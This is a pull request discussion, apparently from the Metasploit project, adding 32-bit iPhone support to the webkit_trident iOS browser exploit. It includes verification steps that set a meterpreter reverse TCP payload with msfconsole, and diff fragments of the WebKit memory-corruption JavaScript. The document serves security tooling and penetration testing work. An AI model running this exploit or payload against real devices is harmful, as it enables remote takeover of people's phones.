### PR TITLE
Support 32bit iPhones on the webkit_trident exploit

### PR DESCRIPTION
**Pull request by timwr**
This change adds support for 32bit iPhones (e.g iPhone 5C) on the trident exploit.
It's still work in progress, with a few TODOs to remove.

## TODO
- [x] Fix iOS model/version detection in `external/source/exploits/CVE-2016-4655/exploit32.c`
- [x] Remove the hard-coded memcpy offset in `external/source/exploits/CVE-2016-4655/exploit32.c`
- [x] Find a way to transfer the mettle payload
- [x] Fix https://github.com/rapid7/mettle/issues/140
- [x] Fix https://github.com/rapid7/mettle/issues/141

## Verification

List the steps needed to make sure this thing works

- [x] Fix TODO
- [x] Build `external/source/exploits/CVE-2016-4655` (e.g run `make install32`)
- [x] Start `msfconsole`
- [x] `use exploit/apple_ios/browser/webkit_trident`
- [x] `set payload apple_ios/armle/meterpreter_reverse_tcp`
- [x] `set LHOST YOUR_LHOST`
- [x] `set LPORT 4444`
- [x] `run`
- [ ] ...
- [x] **Verify** you get a meterpreter session

### CODE REVIEW

File: modules/exploits/apple_ios/browser/webkit_trident.rb [hunk 1]
```diff
@@ -105,247 +112,247 @@ def on_request_uri(cli, request)
...
+        if (bufs[i][k+1] == 0xFFFF0000) {
+          stale[0] = fc;
+          fcp = bufs[i][k];
+          stale[0] = {
+            'a': u2d(105, 0),
+            'b': u2d(0, 0),
+            'c': smsh,
+            'd': u2d(0x100, 0)
+          }
+          stale[1] = stale[0]
```
Comment (bcoles) [inline modules/exploits/apple_ios/browser/webkit_trident.rb]: https://www.youtube.com/watch?v=M94ii6MVilw

File: modules/exploits/apple_ios/browser/webkit_trident.rb [hunk 2]
```diff
@@ -105,247 +112,247 @@ def on_request_uri(cli, request)
...
+          bufs[i][k] += 0x10;
+          bck = stale[0][4];
+          stale[0][4] = 0;
+          stale[0][6] = 0xffffffff;
+          mem0 = stale[0];
+          mem1 = bck;
+          mem2 = smsh;
+          bufs.push(stale)
```
Comment (bcoles) [inline modules/exploits/apple_ios/browser/webkit_trident.rb]: https://www.youtube.com/watch?v=M94ii6MVilw

File: modules/exploits/apple_ios/browser/webkit_trident.rb [hunk 3]
```diff
@@ -105,247 +112,247 @@ def on_request_uri(cli, request)
...
-        pressure[i] = new Uint32Array(0xa000);
-    }
-    for (var i = 0; i < pressure.length; i++) {
-        pressure[i] = 0
-    }
+  for (var i = 0; i < pressure.length; i++) {
+    pressure[i] = new Uint32Array(0xa000);
+  }
+  for (var i = 0; i < pressure.length; i++) {
+    pressure[i] = 0
```
Comment (bcoles) [inline modules/exploits/apple_ios/browser/webkit_trident.rb]: https://www.youtube.com/watch?v=M94ii6MVilw

**Comment by timwr** [comment]
Ping @benjamin-42 and @tihmstar

**Comment by timwr** [comment]
This should be ready for testing. I've pushed a debug binary with logging enabled.

**Comment by timwr** [comment]
Bump. Do we have a device to test this on?
Mines an iPhone 5C on 9.3.2 but something different would be better.

**Comment by busterb** [comment]
I have a 32-bit iPad.

**Comment by timwr** [comment]
Nice! Definitely worth pinging me on slack/hangouts before you start testing. It would be a miracle if this works the first time.

**Comment by busterb** [comment]
I went ahead and landed with the testing I had done locally, plus the mettle payloads bump that brings in the new dylib payload variant needed for the new payloads here.

**Comment by busterb** [comment]
## Release Notes

This adds support for 32bit iPhones (e.g iPhone 5C) with the apple_ios/browser/webkit_trident exploit module. It also adds new 32-bit iOS dylib payload types.

**Pull request merged**